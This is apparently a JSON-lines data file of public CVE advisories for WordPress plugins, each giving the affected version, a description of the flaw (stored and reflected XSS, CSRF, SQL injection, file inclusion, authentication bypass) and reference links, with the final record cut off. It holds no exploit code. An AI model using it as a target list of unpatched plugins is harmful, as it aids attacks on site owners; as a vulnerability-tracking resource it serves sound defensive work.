{"CVE_ID":"CVE-2025-5535","slug":"enigma-buttons","versionImpact":"1.1.3","description":"The e.nigma buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/enigma-buttons\\\/trunk\\\/enigma-buttons.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/enigma-buttons\\\/trunk\\\/enigma-buttons.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c570533-1a67-46ad-9d29-35f70ae3bb6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c570533-1a67-46ad-9d29-35f70ae3bb6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7640","slug":"hiweb-export-posts","versionImpact":"0.9.0.0","description":"The hiWeb Export Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.0.0. This is due to missing or incorrect nonce validation on the tool-dashboard-history.php file. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php), via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hiweb-export-posts\\\/trunk\\\/views\\\/tool-dashboard-history.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hiweb-export-posts\\\/trunk\\\/views\\\/tool-dashboard-history.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hiweb-export-posts\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hiweb-export-posts\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38c23f59-8332-49ab-a219-1f5fac8a283c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38c23f59-8332-49ab-a219-1f5fac8a283c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2757","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click countdowns plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the 'saveLang' functions in versions up to, and including, 0.6.2. This could lead to Cross-Site Scripting due to insufficient input sanitization and output escaping. This makes it possible for subscriber-level attackers to access functions that save plugin data, which can potentially be used to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/tags\\\/0.6.2\\\/templates\\\/templates.php#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/tags\\\/0.6.2\\\/templates\\\/templates.php#L426\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38cc5a39-6ec3-4ce9-b9ad-d4ca5dafe9a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38cc5a39-6ec3-4ce9-b9ad-d4ca5dafe9a7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/tags\\\/0.6.2\\\/waiting.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/tags\\\/0.6.2\\\/waiting.php#L544\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1895","slug":"getwid","versionImpact":"1.8.3","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to Server Side Request Forgery via the get_remote_content REST API endpoint in versions up to, and including, 1.8.3. This can allow authenticated attackers with subscriber-level permissions or above to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9c2a942-c14c-4b59-92a7-6946b2e4731b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9c2a942-c14c-4b59-92a7-6946b2e4731b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/tags\\\/1.8.3\\\/includes\\\/rest-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/tags\\\/1.8.3\\\/includes\\\/rest-api.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3082","slug":"post-smtp","versionImpact":"2.5.7","description":"The Post SMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 2.5.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935537\\\/post-smtp\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935537\\\/post-smtp\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ecd0fa6-4fdb-4780-9560-0bb126800685?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ecd0fa6-4fdb-4780-9560-0bb126800685?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5230","slug":"tm-woocommerce-compare-wishlist","versionImpact":"1.1.7","description":"The TM WooCommerce Compare & Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'tm_woo_wishlist_table' shortcode in versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tm-woocommerce-compare-wishlist\\\/tags\\\/1.1.7\\\/includes\\\/wishlist\\\/wishlist.php#L339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tm-woocommerce-compare-wishlist\\\/tags\\\/1.1.7\\\/includes\\\/wishlist\\\/wishlist.php#L339\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/771ecb8c-feb1-40ea-b47b-a2ae033b3c87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/771ecb8c-feb1-40ea-b47b-a2ae033b3c87?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0682","slug":"pagerestrict","versionImpact":"2.5.5","description":"The Page Restrict plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 2.5.5. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pagerestrict\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pagerestrict\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1234","slug":"exclusive-addons-for-elementor","versionImpact":"2.6.9","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via data attribute in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b87fe3d-a88d-477a-8d91-4d7c2dba4a43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b87fe3d-a88d-477a-8d91-4d7c2dba4a43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042217\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5179","slug":"cowidgets-elementor-addons","versionImpact":"1.1.1","description":"The Cowidgets \u2013 Elementor Addons plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.1 via the 'item_style' and 'style' parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd6acc9-b7df-4cf8-a211-1e39f3abcf79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd6acc9-b7df-4cf8-a211-1e39f3abcf79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-posts-carousel.php#L727\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-posts-carousel.php#L727\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-posts-grid.php#L582\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-posts-grid.php#L582\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-testimonial-carousel.php#L600\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-testimonial-carousel.php#L600\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-portfolio-grid.php#L707\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-portfolio-grid.php#L707\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-staff-carousel.php#L603\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-staff-carousel.php#L603\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-post-navigation.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/content\\\/class-ce-post-navigation.php#L257\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6849","slug":"preloader-plus","versionImpact":"2.2.1","description":"The Preloader Plus \u2013 WordPress Loading Screen Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85e0e1c5-211f-434c-8cc8-1ca676a8c7c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85e0e1c5-211f-434c-8cc8-1ca676a8c7c2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/preloader-plus\\\/tags\\\/2.2.1\\\/inc\\\/preloader-plus.php#L351\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/preloader-plus\\\/tags\\\/2.2.1\\\/inc\\\/preloader-plus.php#L351\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/preloader-plus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/preloader-plus\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8720","slug":"rumbletalk-chat-a-chat-with-themes","versionImpact":"6.3.0","description":"The RumbleTalk Live Group Chat \u2013 HTML5 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rumbletalk-admin-button' shortcode in all versions up to, and including, 6.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e620ae8-03fc-43b5-8e8f-5b0884e8eefb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e620ae8-03fc-43b5-8e8f-5b0884e8eefb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rumbletalk-chat-a-chat-with-themes\\\/trank\\\/public\\\/class-rumbletalk-public.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rumbletalk-chat-a-chat-with-themes\\\/trank\\\/public\\\/class-rumbletalk-public.php#L128\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12283","slug":"wp-pipes","versionImpact":"1.4.1","description":"The WP Pipes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018x1\u2019 parameter in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204551\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204551\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-pipes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-pipes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aa56fc7-8d48-4149-afa7-8f9885de0674?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aa56fc7-8d48-4149-afa7-8f9885de0674?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12096","slug":"exhibit-to-wp-gallery","versionImpact":"0.0.2","description":"The Exhibit to WP Gallery WordPress plugin through 0.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aff431fa-d984-40de-8a15-21f18db97859\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aff431fa-d984-40de-8a15-21f18db97859\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2841","slug":"cart66-cloud","versionImpact":"2.3.7","description":"The Cart66 Cloud plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.3.7 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cart66-cloud\\\/tags\\\/2.3.7\\\/views\\\/admin\\\/html-system-info.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cart66-cloud\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cart66-cloud\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be01bba-e4f4-4818-9612-fc37b648a349?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be01bba-e4f4-4818-9612-fc37b648a349?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3917","slug":"baiduseo","versionImpact":"2.0.6","description":"The ????SEO??(????\/??\/Bing\/????) plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the download_remote_image_to_media_library function in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/baiduseo\\\/tags\\\/2.0.6\\\/inc\\\/index\\\/youhua.php#L371\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/baiduseo\\\/tags\\\/2.0.6\\\/inc\\\/index\\\/youhua.php#L371\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/baiduseo\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/baiduseo\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70361501-8adc-499a-91d2-cf91fab5934a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70361501-8adc-499a-91d2-cf91fab5934a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6588","slug":"funnelcockpit","versionImpact":"1.4.2","description":"The FunnelCockpit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018error\u2019 parameter in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelcockpit\\\/trunk\\\/admin\\\/class-funnelcockpit-admin.php#L433\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnelcockpit\\\/trunk\\\/admin\\\/class-funnelcockpit-admin.php#L433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df2e744f-e1d6-4380-8e24-e98e9df4dd2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df2e744f-e1d6-4380-8e24-e98e9df4dd2f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3081","slug":"wp-mail-logging","versionImpact":"1.11.1","description":"The WP Mail Logging plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 1.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: An incomplete fix was released in 1.11.1.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef20b3e6-d8f4-458e-b604-b46ef16e229e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef20b3e6-d8f4-458e-b604-b46ef16e229e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925728\\\/wp-mail-logging\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925728\\\/wp-mail-logging\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923464\\\/wp-mail-logging\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2923464\\\/wp-mail-logging\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41661","slug":"smarty-for-wordpress","versionImpact":"3.1.35","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in PressPage Entertainment Inc. Smarty for WordPress plugin <=\u00a03.1.35 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/smarty-for-wordpress\\\/wordpress-smarty-for-wordpress-plugin-3-1-35-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/smarty-for-wordpress\\\/wordpress-smarty-for-wordpress-plugin-3-1-35-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0680","slug":"wp-private-content-plus","versionImpact":"3.6","description":"The WP Private Content Plus plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 3.6. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-private-content-plus\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-private-content-plus\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1203","slug":"enhanced-e-commerce-for-woocommerce-store","versionImpact":"6.9.1","description":"The Conversios \u2013 Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'valueData' parameter in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb7d499-28ba-48ef-9798-b7c8cbb7aa3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb7d499-28ba-48ef-9798-b7c8cbb7aa3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/trunk\\\/includes\\\/data\\\/class-tvc-ajax-file.php#L1850\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enhanced-e-commerce-for-woocommerce-store\\\/trunk\\\/includes\\\/data\\\/class-tvc-ajax-file.php#L1850\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3658","slug":"build-app-online","versionImpact":"1.0.21","description":"The Build App Online plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.0.21. This is due to a missing authentication check on the 'user_id' header value in the 'set_user_cart' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d423ad-da51-4616-860d-2b9354d44147?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65d423ad-da51-4616-860d-2b9354d44147?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L814\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/build-app-online\\\/tags\\\/1.0.21\\\/public\\\/class-build-app-online-public.php#L814\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5001","slug":"image-hover-effects-with-carousel","versionImpact":"3.0.2","description":"The Image Hover Effects for Elementor with Lightbox and Flipbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_id', 'oxi_addons_f_title_tag', and 'content_description_tag' parameters in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 